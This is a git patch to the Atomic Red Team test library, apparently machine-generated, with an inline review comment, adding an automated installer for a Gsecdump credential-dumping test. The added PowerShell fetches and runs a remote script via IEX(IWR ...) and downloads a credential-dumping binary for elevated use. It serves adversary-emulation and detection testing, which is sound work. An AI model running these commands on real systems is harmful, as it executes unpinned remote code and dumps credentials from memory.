From 31f946622daaa0e07b2b1b0c564ab4e6fe333314 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Sat, 7 Mar 2020 22:20:30 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master

---
 atomics/T1003/T1003.md | 10 ++++++++--
 atomics/index.yaml | 18 +++++++++++++++---
 2 files changed, 23 insertions(+), 5 deletions(-)

diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index fcd28e63..5fdbb4b4 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -201,6 +201,8 @@ Dump credentials from memory using Gsecdump
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder\T1003\bin\gsecdump.exe|
+| gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|
+| gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
 #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
@@ -211,14 +213,18 @@ Dump credentials from memory using Gsecdump
 #### Dependencies: Run with `powershell`!
-##### Description: Windows Credential Editor must exist on disk at specified location (#{gsecdump_exe})
+##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
 ##### Check Prereq Commands:
 ```
 if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```
-Write-Host Automated installer not implemented yet
+$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
+IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
+if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
+ Move-Item $binpath "#{gsecdump_exe}"
+}
 ```
diff --git a/atomics/index.yaml b/atomics/index.yaml
index b2a0176c..98931d6d 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
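Review bot: The new Get Prereq block checks the gsecdump download against `#{gsecdump_bin_hash}`, but the verifier itself is fetched by `IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")` from a mutable `master` ref with no integrity check, so whatever that branch serves at run time executes with the elevation this test already requires. Pinning the helper URL to a specific commit, or verifying the helper's hash the same way the binary is verified, would close that gap; the identical lines appear in the index.yaml hunk. Separately, `Move-Item $binpath "#{gsecdump_exe}"` assumes the destination folder exists (`Split-Path` only derives the name), and whether a hash-mismatched `$binpath` is removed depends on the helper, which this page does not show. Both files look generated from the atomic YAML definition, so the change presumably belongs in that source file rather than here.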
@@ -19486,12 +19486,24 @@ credential-access:
 description: Path to the Gsecdump executable
 type: Path
 default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
+ gsecdump_url:
+ description: Path to download Gsecdump binary file
+ type: url
+ default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
+ gsecdump_bin_hash:
+ description: File hash of the Gsecdump binary file
+ type: String
+ default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
 dependency_executor_name: powershell
 dependencies:
- - description: Windows Credential Editor must exist on disk at specified location
- (#{gsecdump_exe})
+ - description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
 prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}'
- get_prereq_command: Write-Host Automated installer not implemented yet
+ get_prereq_command: |-
+ $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
+ IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
+ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
+ Move-Item $binpath "#{gsecdump_exe}"
+ }
 executor:
 name: command_prompt
 elevation_required: true